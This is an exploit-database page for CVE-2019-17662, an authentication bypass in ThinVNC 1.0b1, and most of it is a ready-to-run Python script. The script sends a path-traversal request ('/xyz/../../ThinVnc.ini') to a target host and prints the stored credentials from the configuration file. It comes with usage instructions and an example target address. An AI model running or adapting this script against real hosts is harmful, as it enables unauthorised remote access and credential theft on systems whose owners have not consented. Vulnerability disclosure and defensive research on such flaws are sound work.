ThinVNC 1.0b1 Authentication Bypass

2019.10.18
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass # Date: 2019-10-17 # Exploit Author: Nikhith Tumamlapalli # Contributor WarMarX # Vendor Homepage: https://sourceforge.net/projects/thinvnc/ # Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download # Version: 1.0b1 # Tested on: Windows All Platforms # CVE : CVE-2019-17662 # Description: # Authentication Bypass via Arbitrary File Read #!/usr/bin/python3 import sys import os import requests def exploit(host,port): url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini" r = requests.get(url) body = r.text print(body.splitlines()[2]) print(body.splitlines()[3]) def main(): if(len(sys.argv)!=3): print("Usage:\n{} <host> <port>\n".format(sys.argv[0])) print("Example:\n{} 192.168.0.10 5888") else: port = sys.argv[2] host = sys.argv[1] exploit(host,port) if __name__ == '__main__': main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top